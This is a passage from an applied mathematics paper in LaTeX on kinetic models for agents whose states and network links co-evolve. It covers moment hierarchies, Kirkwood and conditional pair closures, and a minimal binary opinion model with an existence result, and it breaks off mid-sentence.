\section{Microscopic Models for Processes on Co-Evolving Networks}
We consider finite weighted graphs ${\cal G}^N(t) =({\cal V},{\cal E}(t),w(t))$, $t \in \R_+$ with $N$ vertices and symmetric edge weights $w_{ij}(t)$ evolving in time. Moreover, we consider a vertex function $s:{\cal V} \times \R_+ \rightarrow \R^m$. The value $s_i(t)$ describes the state of agent $i$ (identified with the respective vertex) at time $t$. Setting $w_{ij}(t) = 0 $ for $(i,j) \notin {\cal E}(t)$, we can equivalently describe such a graph by $(s,w) \in {\cal S}^N \times {\cal W}^N$, where ${\cal S}^N$ is a subset of $\R^{mN}$ and ${\cal W}^N$ is a subset of $\R^{N \times N}$. The exact shape of ${\cal W}^N$ depends on the specific model, e.g. we can restrict to nonnegative weights or include the case of an unweighted graph by choosing ${\cal W}^N = \{0,1\}^{N \times N}$.
We mention that for undirected graphs we can use symmetry of $w$ and avoid loops by $w_{ii}=0$, in this case the description could be even reduced to an element in $\R^{mN + N(N-1)/2}$. Starting from the weights $w$ we say that there is an edge or link between $i$ and $j$ if $w_{ij} \neq 0$.
The microscopic description of the process and the co-evolving network can be carried out by using a probability measure $\mu^N_t$ on ${\cal S}^N \times {\cal W}^N$ for $t \in \R_+$ and formulating an evolution equation for $\mu^N$. We will now first derive a general model structure and then pass to some other special cases based on examples from literature.
\subsection{General Model Structure}
In the following we provide a general structure for the microscopic kinetic models, including continuum structures as in the paradigmatic model above, but alos operators arising from long-range jumps (e.g. abrupt changes of weights or states) and discrete models such as binary
${\cal W} = \{0,1\}$. In addition we consider a random (diffusive) change of states or weights, possibly again depending on the variables themselves, which yields
\begin{align}
\partial_t \mu_t^N =& \frac{1}N \sum_{i=1}^N \sum_{j\neq i} D_{s_i}^* (U(s_i,s_j,w_{ij}) \mu_t^N) + \sum_{i=1}^N \sum_{j\neq i} D_{w_{ij}}^* (V(s_i,s_j,w_{ij}) \mu_t^N) \nonumber \\
& + \sum_{i=1}^N D_{s_i}^* (U_0(s_i) \mu_t^N) - \sum_{i=1}^N D_{s_i}^* D_{s_i} (Q(s_i) \mu_t^N) - \sum_{i=1}^N \sum_{j\neq i} D_{w_{ij}}^*D_{w_{ij}}(R(s_i,s_j,w_{ij}) \mu_t^N). \label{eq:general}
\end{align}
A variety of different models of the above kind can be found in literature, below we will show how to put them into this general structure.
\subsection{Important Cases}
\subsubsection{Continuous State and Weight Model with State Diffusion }
A slight variation of the paradigmatic model is obtained when adding random change of the state variable via a Wiener process (with effective diffusion coefficient $R$), which leads to
\begin{align}
&\partial_t \mu_t^N + \frac{1}N \sum_{i=1}^N \sum_{j\neq i} \nabla_{s_i} \cdot (U(s_i,s_j,w_{ij}) \mu_t^N) + \sum_{i=1}^N \sum_{j\neq i} \partial_{w_{ij}} (V(s_i,s_j,w_{ij}) \mu_t^N) \nonumber \\
& \qquad = -\sum_{i=1}^N \nabla_{s_i} \cdot (U_0(s_i) \mu_t^N) +\sum_{i=1}^N \Delta_{s_i} (Q(s_i) \mu_t^N) .
\end{align}
Here $D_{s_i} = \nabla$ and $D_{s_i}^*= - \nabla \cdot$. In particular in opinion formation models the impact of noise in the state variable has been highlighted in the last years (cf. \cite{carro,raducha}), which is then incorporated in the additional diffusion term. We give a recent example of an agent-based model combining noise with a network co-evolution:
\begin{example}
In \cite{boschi} a completely continuous model is studied, given by (with the rescaled weights $w_{ij} = N J_{ij}$)
\begin{align*}
ds_i &= - s_i dt + I_i dt + \frac{1}N \sum_{j \neq i} w_{ij} g(s_j) dt + \sigma dW_i \\
dw_{ij} &= \gamma ( J_0 g(s_i) g(s_j) - w_{ij}) dt
\end{align*}
where the $W_i$ are uncorrelated Wiener processes, $\gamma$ and $J_0$ are positive functions, $g$ is a sigmoidal function, and $I_i$ models external influence by media.
Here the state space is ${\cal S}=\R$ and the weight space is ${\cal W}=\R^+$, one easily notices that the dynamics of the weights $w_{ij}$ cannot lead to a negative value if $g$ is a nonnegative function. The arising equation for $\mu_t^N$, ignoring the external influence $I$, is given by
\begin{align} \label{eq:boschi}
\partial_t \mu^N_t =& - \frac{1}N \sum_{i=1}^N \sum_{j \neq i} \nabla_{s_i} \cdot ( (- s_i + \frac{1}N \sum_{j \neq i} w_{ij} g(s_j) \mu_t^N )
\nonumber \\ & - \sum_{i=1}^N \sum_{j \neq i} \nabla_{w_{ij}} \cdot ( \gamma ( J_0 g(s_i) g(s_j) - w_{ij}) \mu_t^N ) + \frac{\sigma^2}2 \sum_{i=1}^N \Delta_{s_i} \mu_t^N.
\end{align}
We see that \eqref{eq:boschi} is a special case of \eqref{eq:general} with diffusion coefficients $Q=\frac{\sigma^2}2$, $R=0$, external force $U_0(s_i) = - s_i$ and interactions
$$ U(s_i,s_j,w_{ij}) = w_{ij} g(s_j), \qquad V(s_i,s_j,w_{ij}) =\gamma ( J_0 g(s_i) g(s_j) - w_{ij}) .$$
\end{example}
\subsubsection{Continuous States and Binary Weights}
An important case arising in many models is the one of a continuous state space ${\cal S}$ combined with an unweighted graph, which can be rephrased as a set of binary weights ${\cal W}=\{0,1\}$. A corresponding formulation of the kinetic model is given by
\begin{equation}
\partial_t \mu^N_t + \frac{1}N \sum_{i=1}^N \sum_{j\neq i} \nabla_{s_i} \cdot (U(s_i,s_j,w_{ij}) \mu_t^N) =
\sum_{i=1}^N \sum_{j\neq i} (V(s_i,s_j,w_{ij}') \mu_t^{N,ij} - V(s_i,s_j,w_{ij} ) \mu_t^N),
\end{equation}
where $w_{ij}'=1-w_{ij}$ and $\mu_t^{N,ij}$ equals $\mu_t^N$ with argument $w_{ij}$ changed to $w_{ij}'$.
In this case $D_{s_i} = \nabla_{s_i}$ and
$$ D_{w_i}^* \varphi = \varphi^{ij} - \varphi, $$
where $\varphi^{ij}$ denotes the evaluation of argument $w_{ij}$ changed to $w_{ij}'$.
\begin{example}In recent variants of bounded confidence models an averaging process of the form
\begin{equation}
ds_i = \frac{1}N \sum_{j \neq i} w_{ij} (F(s_j) - s_i)~dt
\end{equation}
is carried out on opinions with a linear or nonlinear function $F: \R^+ \rightarrow \R^+$, e.g. $F(s) = k \tanh(\alpha s)$ as in \cite{baumann}. A new edge between $i$ and $j$ is established with a rate $\frac{1}\tau r(|s_i-s_j|)$, $\tau$ a small relaxation time and $r$ being a decreasing function on $\R^+$. The links are removed quickly, which again corresponds to a rate $\frac{1}\tau$. Thus, we obtain a special case of \eqref{eq:general} with ${\cal S}=\R^+$, ${\cal W}=\{0,1\}$, $U_0=Q=R=0$ and
$$ U(s_i,s_j,w_{ij}) = w_{ij}(F(s_j) - s_i), \qquad V(s_i,s_j,w_{ij}) = \frac{1}\tau (r( |s_i-s_j|) - w_{ij}). $$
In the limit $\tau \rightarrow 0$ we recover bounded confidence models like the celebrated Hegselmann-Krause model \cite{hegselmann} with weight $w_{ij} = r( |s_i-s_j|). $
\end{example}
\subsubsection{Discrete States and Binary Weights}
A variety of models (cf. \cite{benatti,maia,min,pham,pham2,raducha,thurner0,thurner}) is based on discrete states (often binary ${\cal S}=\{-1,1\}$) and binary weights (${\cal W}=\{0,1\}$), the interactions consequently being a switching of states between connected particles ($w_{ij}=1$) and the addition and removal of links (changes of weigths between $0$ and $1$ depending on the states). The corresponding evolution of the $N$-particle and weight distribution is thus described by
\begin{align*}
\partial_t \mu_t^N =& \frac{1}N \sum_{i=1}^N \sum_{j \neq i} \left(\sum_{s_j^* \in {P(s_i)}} U(s_i^*,s_j^*,w_{ij}) \mu_t^{N,s,ij}-U(s_i,s_j,w_{ij}) \mu_t^N \right) +
\\ & \sum_{i=1}^N \sum_{j \neq i} (V(s_i,s_j,w_{ij}') \mu_t^{N,w,ij} \mu_t^N-V(s_i,s_j,w_{ij}) \mu_t^N)
\end{align*}
where $P(s_i)$ is the set of pre-collisional states $s_j^*$ such that there exists $s_i^* \in {\cal S}$, whose interaction with $s_j^*$ leads to post-collisional state $s_i$.
\begin{example}
The co-evolving voter model, as considered in \cite{min,raducha,thurner0,thurner} is a generic example of a discrete state and weight model. Originally it is formulated in discrete time steps, where in each step a node is picked at random. Then, a neighbouring node is chosen, whose state $s^*$ is compared with the state $s$ of the original node. If $s$ and $s^*$ differ, the link is removed (i.e. the weight is changed from one to zero) with probability $p$, while with probability $1-p$ the state $s$ is changed to $s'$. In the first case another node is chosen randomly and connected to the first one if it has the same state $s$. As a continuous time analogue (with continuous waiting times between events) we obtain the $N$-particle equation
\begin{align}
\partial_t \mu_t^N =& \frac{1}N \sum_{i=1}^N p\left( \sum_{j \neq i, w_{ij}=0, s_j \neq s_i} \frac{\sum_{k \neq i,j, w_{ik}=1, s_k = s_i}\mu_t^{N,ijk}}{\sum_{k \neq i,j, w_{ik}=1, s_k = s_i} 1} -
\sum_{j \neq i, w_{ij}=1, s_j \neq s_i} \mu_t^N \right) + \nonumber
\\ & \frac{1}N \sum_{i=1}^N (1-p) \left( \sum_{j \neq i, w_{ij}=1, s_j = s_i} \mu_t^{N,i} - \sum_{j \neq i, w_{ij}=1, s_j \neq s_i} \mu_t^N\right) \\
=& \frac{1-p}N \sum_{i=1}^N \sum_{j \neq i} w_{ij} (\mu_t^{N,i} |s_j -s_i'| - \mu_t^{N } |s_j -s_i | ) + \nonumber \\&
\frac{ p}N \sum_{i=1}^N \sum_{j \neq i} \left( w_{ij}' |s_j-s_i|\frac{\sum_{k \neq i,j}w_{ik} |s_k - s_i'| \mu_t^{N,ijk} }{\sum_{k \neq i,j } w_{ik} |s_k - s_i'|} - w_{ij}|s_j-s_i| \mu_t^N\right) \nonumber
\end{align}
Here $\mu_t^{N,i}$ denotes $\mu_t^N$ with state $s_i$ changed to $s_i'$ and $\mu_t^{N,ijk}$ with weights $w_{ij}, w_{ik}$ changed to
$w_{ij}', w_{ik}'$.
This fits into the modelling using
$$ D_{s_i} \varphi = \varphi^i - \varphi, \quad D_{w_{ij}} \varphi = \varphi^{ij} - \varphi $$
and $ U(s_i,s_,w_{ij}) = (1-p) w_{ij} |s_i-s_j|$, up to the three particle interaction with $k$.
We can also consider a variant where a link to a neighbouring node is changed with probability $pq$ and a link to a new node is established with probability $p(1-q)$, which leads to
\begin{align}
\partial_t \mu_t^N
=& \frac{1-p}N \sum_{i=1}^N \sum_{j \neq i} w_{ij} (\mu_t^{N,i} |s_j -s_i'| - \mu_t^{N } |s_j -s_i | ) + \nonumber \\&
{ pq} \sum_{i=1}^N \sum_{j \neq i} \left( w_{ij}' |s_j-s_i| \mu_t^{N,ij} - w_{ij}|s_j-s_i| \mu_t^N\right) + \nonumber \\&
{ p(1-q)} \sum_{i=1}^N \sum_{j \neq i} \left( w_{ij}' |s_j-s_i'| \mu_t^{N,ij} - w_{ij}|s_j-s_i'| \mu_t^N\right) .
\end{align}
Here we exactly obtain a special case of \eqref{eq:general} with the above discrete operators $D_{s_i}$ and $D_{w_{ij}}$ as well as the potentials
\begin{equation}
U(s_i,s_j,w_{ij}) = (1-p) w_{ij}|s_j -s_i |, \quad V(s_i,s_j,w_{ij}) = p w_{ij}( q |s_j -s_i | + (1-q)|s_j -s_i' |).
\end{equation}
\end{example}
\begin{example} {\bf A Minimal Model. }
As a basis for further analysis we consider a minimal model with binary states ${\cal S} = \{-1,1\}$ and binary weights ${\cal W}=\{0,1\}$, where interaction between states only appears between nodes that are connected ($w_{ij}=1$). This leads to an equation of the form
\begin{align}
\partial_t \mu_t^N =& \frac{1}N \sum_{i=1}^N \sum_{j \neq i} w_{ij}( \alpha(s_i',s_j) \mu_t^{N,i}-\alpha(s_i,s_j) \mu_t^N ) + \nonumber
\\ & \sum_{i=1}^N \sum_{j \neq i} \left( \beta(s_i,s_j) (w_{ij}\mu_t^{N, ij} - w_{ij}' \mu_t^N) + \gamma(s_i,s_j) (w_{ij}'\mu_t^{N, ij} - w_{ij} \mu_t^N) \right) , \label{eq:minimal}
\end{align}
where $\alpha$ is the rate of changing states, $\beta$ the rate to establish links and $\gamma$ the rate of removing links.
Here we denote by $ \mu_t^{N,i}$ the version of $\mu_t^{N}$ with argument $s_i'=-s_i$ instead of $s_i$ and by $\mu_t^{N, ij} $ the version with argument $w_{ij}'=1-w_{ij}$ instead of $w_{ij}$.
\end{example}
\section{Moment Hierarchies and Closure Relations}
The classical transition from microscopic to macroscopic models in kinetic theory is based on a hierarchy of moments, also called {\em BBGKY hierarchy} in the standard setting (cf. \cite{cercignani3,golse,spohn}) or {\em Vlasov hierarchy} in the corresponding setting (cf. \cite{golsemouhot,spohnneunzert}). We want to derive a similar approach in the following, where we have to take into account the additional correspondence on the weights however. For the sake of simpler exposition and notation we will restrict ourself to the case of an undirected graph without loops, but an analogous treatment is possible for directed weighted graphs. Our approach will be to consider a system of moments for $k$ vertices and the corresponding edge weights between them. This means the first moment just depends on $s_1$, the second on $s_1, s_2$ and $w_{12}$, the $k$-th on $k$ states and
$\frac{k(k-1)}2$ weights.
Let us denote by $z_k = (s_i,w_{ij})_{1 \leq i,j \leq k, i \neq j}$ a vector corresponding to the first $k$ states and the weights between them and by $z^{N,k}$ the full vector of states and weights without $z_k$. Then we define the corresponding moment
\begin{equation}
\mu^{N:k}_t = \int \mu^N_t(dz^{N,k}),
\end{equation}
with the obvious modification to a sum in the case of a discrete measure.
Integrating \eqref{eq:liouville} we actually see that the moments $\mu^{N:k}_t$ satisfy a closed system of equations, we have for $k=1,\ldots,N$
\begin{align}
& \partial_t \mu^{N:k}_t = \frac{1}N \sum_{i \leq k} \sum_{j \neq i, j \leq k} D_{s_i}^* ( U(s_i,s_j,w_{ij}) \mu_t^{N:k} )
+ \sum_{i \leq k} \sum_{j \neq i, j \leq k} D_{w_{ij}}^* ( V(s_i,s_j,w_{ij}) \mu_t^{N:k} )
\nonumber \\ & \qquad \qquad + \frac{N-k}N \sum_{i \leq k} D_{s_i}^* ( \int U(s_i,s_{k+1},w_{ik+1}) \mu_t^{N:k+1} (dz^{k+1,k} )
+ \sum_{i \leq k} D_{s_i}^* (U_0(s_i) \mu_t^{N:k}) \nonumber \\ & \qquad \qquad - \sum_{i\leq k} D_{s_i}^* D_{s_i} (Q(s_i) \mu_t^{N:k}) - \sum_{i\leq k} \sum_{j \neq i, j \leq k} D_{w_{ij}}^*D_{w_{ij}}(R(s_i,s_j,w_{ij}) \mu_t^{N:k}),
\end{align}
where the integration with the measure $ \mu_t^{N:k+1} $ is on the variables $z^{k+1,k}=(s_{k+1},w_{1k+1},\ldots,w_{kk
+1}).$
\subsection{Infinite Hierarchy}
In the limit $N\rightarrow \infty$ we formally obtain the infinite-system
\begin{align}
& \partial_t \mu^{\infty:k}_t = \sum_{i \leq k} D_{s_i}^* ( \int U(s_i,s_{k+1},w_{ik+1}) \mu_t^{\infty:k+1}(dz^{k+1,k}) )
\nonumber \\ & \qquad \qquad + \sum_{i \leq k} \sum_{j \neq i, j \leq k} D_{w_{ij}}^* ( V(s_i,s_j,w_{ij}) \mu_t^{\infty:k} )
+ \sum_{i \leq k} D_{s_i}^* (U_0(s_i) \mu^{\infty:k}_t) \nonumber \\ & \qquad \qquad - \sum_{i\leq k} D_{s_i}^* D_{s_i} (Q(s_i) \mu^{\infty:k}_t) - \sum_{i\leq k} \sum_{j \neq i, j \leq k} D_{w_{ij}}^*D_{w_{ij}}(R(s_i,s_j,w_{ij}) \mu^{\infty:k}_t)
\end{align}
which has a similar structure as the BBGKY/Vlasov-hierarchy in kinetic theory. The closedness of the infinite system confirms our choice of marginals in the space of states and weights.
Let us mention that the first marginal is just the particle density in state space and satisfies
\begin{equation}
\partial_t \mu_t^{\infty:1} = D_{s_1}^* \left[ (\int U(s_1,s_2,w_{12}) \mu_t^{\infty:2}(ds_2,dw_{12}) + U_0(s_1)\mu_t^{\infty:1}\right] - D_{s_1}^* D_{s_1} (Q(s_1) \mu_t^{\infty:1})
\end{equation}
It is apparent that there is no simple closure or propagation of chaos in terms of $\mu_t^{\infty:1}$ as long as there is any nontrivial dependence of $U$ and $\mu_t^{\infty:2}$ on the weight $w_{12}$. As we shall see below, at least in the paradigmatic Vlasov-type model there is some kind of propagation of chaos for the system in terms of the states only, if the measures $\mu_t^{\infty:k}$ exhibit weight concentration phenomena, i.e., concentrate at $w_{ij} = W(s_i,s_j,t)$ for some function $W$.
For the description of the system and its nontrivial network structure the second marginal $\mu_t^{\infty:2}$ appears to be the more relevant quantity anyway. It satisfies
\begin{align} \label{eq:pairunclosed}
\partial_t \mu^{\infty:2}_t =& \sum_{i \leq 2} D_{s_i}^* \left[\int U(s_i,s_{3},w_{i3}) \mu_t^{\infty:3} (ds_3 dw_{13} dw_{23}) +
U_0(s_i)\mu_t^{\infty:2}- D_{s_i} (Q(s_i) \mu^{\infty:2}_t) \right] \nonumber \\ & + D_{w_{12}}^* \left[ V(s_1,s_2,w_{12}) \mu_t^{\infty:2} - D_{w_{12}}(R(s_1,s_2,w_{12}) \mu^{\infty:2}_t) \right]
\end{align}
We shall below discuss closure relations that approximate the solutions solely in terms of $\mu^{\infty:2}_t$.
\subsection{Pair Closures}
In the following we discuss different options for obtaining a closure in \eqref{eq:pairunclosed}.
A standard closure relation used in statical mechanics is the so-called Kirkwood closure (cf. \cite{kirkwood,singer}), which approximates the triplet distribution by
pair and single particle distributions, more precisely it assumes a factorization of the triplet correlation into pair correlations.
The analogous form for our setting is given by
\begin{equation} \label{eq:kirkwood}
\mu_t^{ 3}(dz_3) = \frac{\mu_t^{ 2}(ds_1 ds_2 dw_{12})}{\mu_t^1(ds_1)\mu_t^1(ds_2)} \frac{\mu_t^{ 2}(ds_1 ds_3 dw_{13})}{\mu_t^1(ds_1)\mu_t^1(ds_3)} \frac{\mu_t^{ 2}(ds_2 ds_3 dw_{23})}{\mu_t^1(ds_2)\mu_t^1(ds_3)} \mu_t^1(ds_1)\mu_t^1(ds_2)\mu_t^1(ds_3)
\end{equation}
where the quotients denote the respective Radon-Nikodym derivatives. The Kirkwood closure might yield an overly complicated system for the pair distribution, which we see by examining the relevant terms, namely the integrals of $U$ in \eqref{eq:pairunclosed}. For $i=1$ we have
$$ \int U(s_1,s_{3},w_{13}) \mu_t^{\infty:3} (ds_3 dw_{13} dw_{23}) = \int U(s_1,s_{3},w_{13}) \eta_t^2 \mu_t^{ 2}(ds_1 ds_2 dw_{12}) \frac{\mu_t^{ 2}(ds_1 ds_3 dw_{13})}{\mu_t^1(ds_1) }
$$
where $\eta_t^2$ is the projection of the Radon-Nikodym derivative of $\mu_t^2$ to the first two variables, i.e. for each set $A \subset {\cal S}^2$,
$$ \int_A \eta_t^2 \mu_t^1(ds_2)\mu_t^1(ds_3) = \int_A \int_{{\cal W}} {\mu_t^{ 2}(ds_2 ds_3 dw_{23})} . $$
Note that $\frac{\mu_t^{ 2}(ds_1 ds_3 dw_{13})}{\mu_t^1(ds_1) }$ is the conditional distribution of $s_3$ and $w_{13}$ given $s_1$.
As argued for a similar class of particle systems (without the network weights) in \cite{berlyand1,berlyand2}, $\eta_t^2$ seems to be unnecessary for a suitable approximation of the integrals, hence their closure simplifies to
\begin{equation} \label{eq:berlyand}
\int U(s_i,s_{3},w_{i3}) \mu_t^{\infty:3} (ds_3 dw_{13} dw_{23}) = \int U(s_i,s_{3},w_{i3}) \mu_t^{ 2}(ds_1 ds_2 dw_{12}) \frac{\mu_t^{ 2}(ds_i ds_3 dw_{i3})}{\mu_t^1(ds_1) } .
\end{equation}
In order to state the arising equation it is more convenient to use the weak formulation, for which we obtain
\begin{align}
\frac{d}{dt} \int \varphi(z_2) \mu^{ 2}_t(dz_2) =&
\sum_{i \leq 2} \int D_{s_i} \varphi(z_2) (U(s_i,s_{3},w_{i3}) \gamma_t(s_i;ds_3,dw_{i3}) +
U_0(s_i)\mu_t^{2}(dz_2 )) - \nonumber \\ &
\sum_{i \leq 2} \int D_{s_i} \varphi(z_2) D_{s_i} (Q(s_i) \mu^{2}_t ) (dz_2 )
+ \nonumber \\ & \int D_{w_{12}} \varphi(z_2) V(s_1,s_2,w_{12}) (\mu_t^{ 2}(dz_2 ) - D_{w_{12}}(R(s_1,s_2,w_{12}) \mu^{2}_t)(dz_2 ) )
\end{align}
with the conditional distribution
$$ \gamma_t(s_i;ds_3,dw_{i3}) = \frac{\mu_t^{ 2}}{\mu_t^{ 1}}(ds_3,dw_{i3}).$$
\section{Minimal Model}
In the following we further study the minimal model \eqref{eq:minimal} with the above closures. With the short-hand notations
\begin{align}
f_{\pm,\pm} &= \mu_t^2(\pm 1, \pm 1, 1), \quad g_{\pm,\pm} = \mu_t^2(\pm 1, \pm 1, 0), \\
\rho_+ &= f_{++} + g_{++} + f_{+-} + g_{+-} \\
\rho_- &= f_{--} + g_{--} + f_{+-} + g_{+-}
\end{align}
noticing $f_{+-} = f_{-+}$ due to symmetry, we arrive at the following models: In the case of the closure based on the conditional distribution \eqref{eq:berlyand} we have
\begin{align}
\partial_t f_{++} =& \alpha_{-+} \frac{f_{+-}^2}{\rho_-} - \alpha_{+-} \frac{f_{++} f_{+-}}{\rho_+} + \beta_{++} g_{++} - \gamma_{++} f_{++}
\label{eq:minimal1} \\
\partial_t g_{++} =& \alpha_{-+} \frac{g_{+-}f_{+-}}{\rho_-} - \alpha_{+-} \frac{g_{++} f_{+-}}{\rho_+} - \beta_{++} g_{++} + \gamma_{++} f_{++} \\
\partial_t f_{--} =& \alpha_{+-} \frac{f_{+-}^2}{\rho_+} - \alpha_{-+} \frac{f_{--} f_{+-}}{\rho_-} + \beta_{--} g_{--} - \gamma_{--} f_{--} \\
\partial_t g_{--} =& \alpha_{+-} \frac{g_{+-}f_{+-}}{\rho_+} - \alpha_{-+} \frac{g_{--} f_{+-}}{\rho_-} - \beta_{--} g_{--} + \gamma_{--} f_{--} \\
\partial_t f_{+-} =& - \alpha_{-+} \frac{f_{+-}^2}{2\rho_-} + \alpha_{+-} \frac{f_{++} f_{+-}}{2\rho_+} - \alpha_{+-} \frac{f_{+-}^2}{2\rho_+} + \alpha_{-+} \frac{f_{--} f_{+-}}{2\rho_-} \nonumber \\
& +\beta_{+-} g_{+-} - \gamma_{+-} f_{+-} \\
\partial_t g_{+-} =& - \alpha_{-+} \frac{g_{+-}f_{+-}}{2\rho_-} + \alpha_{+-} \frac{g_{++} f_{+-}}{2\rho_+} - \alpha_{+-} \frac{g_{+-}f_{+-}}{2\rho_+} + \alpha_{-+} \frac{g_{--} f_{+-}}{2\rho_-} \nonumber \\ & - \beta_{+-} g_{+-} + \gamma_{+-} f_{+-} \label{eq:minimal6}
\end{align}
We can also introduce the weight-averaged densities $h_{\pm\pm} = f_{\pm\pm} + g_{\pm\pm}$, which satisfy the equations
\begin{align}
\partial_t h_{++} =& \alpha_{-+} \frac{h_{+-}f_{+-} }{\rho_-} - \alpha_{+-} \frac{h_{++} f_{+-}}{\rho_+} \\
\partial_t h_{--} =& \alpha_{+-} \frac{h_{+-}f_{+-}}{\rho_+} - \alpha_{-+} \frac{h_{--} f_{+-}}{\rho_-} \\
\partial_t h_{+-} =& - \frac{1}2 (\partial_t h_{++} + \partial_t h_{--}),
\end{align}
the latter being equal to the conservation property $\partial_t (\rho_- + \rho_+) = 0$.
For the Kirkwood closure we find instead
\begin{align}
\partial_t f_{++} =& \alpha_{-+} \frac{f_{+-}^2}{\rho_-} \frac{h_{++}}{\rho_+^2} - \alpha_{+-} \frac{f_{++} f_{+-}}{\rho_+} \frac{h_{+-}}{\rho_+ \rho_-}+ \beta_{++} g_{++} - \gamma_{++} f_{++}
\label{eq:minimalk1} \\
\partial_t g_{++} =& \alpha_{-+} \frac{g_{+-}f_{+-}}{\rho_-} \frac{h_{++}}{\rho_+^2} - \alpha_{+-} \frac{g_{++} f_{+-}}{\rho_+} \frac{h_{+-}}{\rho_+ \rho_-}- \beta_{++} g_{++} + \gamma_{++} f_{++} \\
\partial_t f_{--} =& \alpha_{+-} \frac{f_{+-}^2}{\rho_+} \frac{h_{--}}{\rho_-^2}- \alpha_{-+} \frac{f_{--} f_{+-}}{\rho_-} \frac{h_{+-}}{\rho_+ \rho_-}+ \beta_{--} g_{--} - \gamma_{--} f_{--} \\
\partial_t g_{--} =& \alpha_{+-} \frac{g_{+-}f_{+-}}{\rho_+} \frac{h_{--}}{\rho_-^2} - \alpha_{-+} \frac{g_{--} f_{+-}}{\rho_-} \frac{h_{+-}}{\rho_+ \rho_-}- \beta_{--} g_{--} + \gamma_{--} f_{--} \\
\partial_t f_{+-} =& - \alpha_{-+} \frac{f_{+-}^2}{2\rho_-} \frac{h_{++}}{\rho_+^2} + \alpha_{+-} \frac{f_{++} f_{+-}}{2\rho_+} \frac{h_{+-}}{\rho_+ \rho_-} - \alpha_{+-} \frac{f_{+-}^2}{2\rho_+} \frac{h_{--}}{\rho_-^2} \nonumber \\
&+ \alpha_{-+} \frac{f_{--} f_{+-}}{2\rho_-} \frac{h_{+-}}{\rho_+ \rho_-} +\beta_{+-} g_{+-} - \gamma_{+-} f_{+-} \\
\partial_t g_{+-} =& - \alpha_{-+} \frac{g_{+-}f_{+-}}{2\rho_-} \frac{h_{++}}{\rho_+^2}+ \alpha_{+-} \frac{g_{++} f_{+-}}{2\rho_+} \frac{h_{+-}}{\rho_+ \rho_-} - \alpha_{+-} \frac{g_{+-}f_{+-}}{2\rho_+} \frac{h_{--}}{\rho_-^2}\nonumber \\ &+ \alpha_{-+} \frac{g_{--} f_{+-}}{2\rho_-} \frac{h_{+-}}{\rho_+ \rho_-} - \beta_{+-} g_{+-} + \gamma_{+-} f_{+-} \label{eq:minimalk6}
\end{align}
The equations for the weight-averaged densities are given by
\begin{align}
\partial_t h_{++} =& \alpha_{-+} \frac{h_{+-}f_{+-} }{\rho_-} \frac{h_{++}}{\rho_+^2} - \alpha_{+-} \frac{h_{++} f_{+-}}{\rho_+} \frac{h_{+-}}{\rho_+ \rho_-} \\
\partial_t h_{--} =& \alpha_{+-} \frac{h_{+-}f_{+-}}{\rho_+} \frac{h_{--}}{\rho_-^2} - \alpha_{-+} \frac{h_{--} f_{+-}}{\rho_-} \frac{h_{+-}}{\rho_+ \rho_-}\\
\partial_t h_{+-} =& - \frac{1}2 (\partial_t h_{++} + \partial_t h_{--}).
\end{align}
\subsection{Transient Solutions}
In order to provide a first analysis of solutions to \eqref{eq:minimal1}-\eqref{eq:minimal6} a key observation is to consider the
evolution of the single particle densities $\rho_+$ and $\rho_-$ respectively. We find
\begin{equation} \label{eq:rhoplusevolution}
\partial \rho_+ = - \partial_t \rho_- = \left( \frac{\alpha_{-+}}2 - \frac{\alpha_{+-}}2\right) f_{+-},
\end{equation}
in the case of \eqref{eq:minimal1}-\eqref{eq:minimal6}, and
\begin{equation} \label{eq:rhoplusevolutionk}
\partial \rho_+ = - \partial_t \rho_- = \left( \frac{\alpha_{-+}}2 - \frac{\alpha_{+-}}2\right) \frac{\rho_- h_{++}+ \rho_+ h_{--}}{\rho_+ \rho_-} \frac{h_{+-}}{\rho_+ \rho_-}f_{+-},
\end{equation}
in the case of \eqref{eq:minimalk1}-\eqref{eq:minimalk6},
which implies first of all that $\rho_+$ is conserved if $\alpha_{-+} = \alpha_{-+}$. We also find the natural properties that $\rho_+$ increases if $\alpha_{-+} > \alpha_{-+}$, i.e. if there is a stronger bias towards the positive state, and decreases if $\alpha_{-+} < \alpha_{-+}$. In these cases we see immediately that concentration (consensus in the language of opinion formation) is reached if $f_{+-}$ is bounded away from zero. With a standard proof (see Appendix) we obtain the following result:
\begin{thm} \label{minimalexistencethm}
For each nonnegative starting value with $\rho_+(0) \in (0,1)$, $\rho_-(0) = 1 - \rho_+(0)$, there exists a time $T_* > 0$ such that there exists a unique solution
$$ (f_{++},g_{++},f_{--},g_{--},f_{+-},g_{+-}) \in C^\infty([0,T_*))^6 $$
of \eqref{eq:minimal1}-\eqref{eq:minimal6} as well as of \eqref{eq:minimalk1}-\eqref{eq:minimalk6}. Moreover, either $T_* = \infty$ or $\rho_+(t) \rho_-(t) \rightarrow 0$
as $t \uparrow T_*$. If $\alpha_{-+} = \alpha_{-+}$ then $T_* = \infty$.
\end{thm}
If $T_*$ is finite we thus see that either the limit of $\rho_+$ or $\rho_-$ vanishes and since $f_{+-} \leq \rho_+$ and $f_{+-} \leq \rho_-$ we obtain $f_{+-}(t) \rightarrow 0$ as well. This is not surprising, since such as state means consensus at one of the two states and hence there are no agents of another state to connect to. A possibly more interesting situation can happen if $T_* = \infty$, then we might have polarization, i.e. $f_{+-} = 0$ with $\rho_+$ and $\rho_-$ both being positive. This means there are agents of either state but no connection between them. A direct insight can be obtained by simply integrating \eqref{eq:rhoplusevolution} in time, which yields
$$ 1 \geq \left( \frac{\alpha_{-+}}2 - \frac{\alpha_{+-}}2\right) \int_0^\infty f_{+-}(t)~dt. $$
If the coefficient on the right-hand side is vanishing, $f_{+-}$ is integrable, which implies the following result:
\begin{cor}
Let $\alpha_{-+} \neq \alpha_{-+}$ and let $ (f_{++},g_{++},f_{--},g_{--},f_{+-},g_{+-}) \in C^\infty([0,T_*))^6 $ be the unique solution of \eqref{eq:minimal1}-\eqref{eq:minimal6}. If $T_* = \infty$, then $f_{+-}(t) \rightarrow 0$ as $t \rightarrow \infty$.
\end{cor}
As a consequence of this result we may expect to find polarized stationary solutions of the minimal model with closure based on the conditional distribution \eqref{eq:minimal1}-\eqref{eq:minimal6}, which we further investigate in an asymptotic parameter regime below.
A similar analysis for the minimal model with Kirkwood closure \eqref{eq:minimalk1}-\eqref{eq:minimalk6} is less obvious due to the additional terms in \eqref{eq:rhoplusevolutionk}. With $\rho_+ \leq 1$, $\rho_- \leq 1$, and $h_{+-} \geq f_{+-}$ we can at least infer the
